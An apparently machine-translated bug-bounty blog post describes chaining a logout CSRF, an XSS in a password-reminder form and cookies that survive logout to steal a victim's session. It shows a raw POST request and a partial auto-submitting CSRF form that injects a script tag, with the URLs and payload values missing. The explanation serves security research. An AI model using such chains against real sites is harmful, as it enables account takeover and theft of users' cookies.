How to use XSS in login form/remember password/registration

So, we have Stored or Reflected Xss in Forgot your password.

But we can not carry out the attack on the user, since this is not a XSS in user account. And if we can not provide the required PoC, this vulnerability provides no threat and can not claim a greater reward in bug bounties!

However, the XSS is a personal account is fairly easy to rotate, and now I tell you how to do it ..

There is a page

There is POST request and not available filtering in email:

POST /rememberpassword HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 159

In general, our task – to lure the victim to, run our code and steal her cookies. But this will not work if the victim is in his account.

And here to help us two vulnerabilities.

The first vulnerability – LOGOUT CSRF.
1) The vulnerability lies in the fact that you can LOG OUT the victim without her consent, ie it goes on, comes from an account.

To prevent this, for each logout link is attached unique csrf token, such as in social network .

2) The vulnerability broken authentication & session managament. It lies in the fact that when the victim came out of their account, and then went – cookies have not changed! Dangerous, number 2 , can be used to exploit with other bugs. It is necessary to generate a new cookie values in the new input. We need to test twice – compare cookies to exit after the next login, no one character should not change.
Thus, the second bug, as a passive, nothing with him do not make. And with the first write our automatic CSRF exploit, loaded logout link from victim account in html hat as a picture:

<img src=””&gt;
<form action=”; method=”POST”>
<input type=”hidden” name=”formName” value=”rememberpassword” />
<input type=”hidden” name=”email” value=”&lt;script src=&apos;; />
<input type=”hidden” name=”humanizm[id]” value=”d8ac3bdda21255b54bcdd549bb15962c” />
<input type=”hidden” name=”humanizm[input]” value=”” />
<input type=”submit” id=”qiece” value=”Submit request” />



Well, our exploit done.

And when we stole victim’s cookies, we are free to login to her account, because COOKIES NOT DESTROY AFTER EXIT!!

Similar vulnerabilities (Logout CSRF/Broken Authentication) caught me everywhere and with their help, with the help of the XSS (is not in the user account) and with the help of sniffer can be easily hacked account (unless, of course, no httpOnly).

If y enjoy this article, subscribe me on twitter /retweet and I’m add more articles in the process of research the security of web applications 🙂

#bugbounty #xss #BrokenAuthentication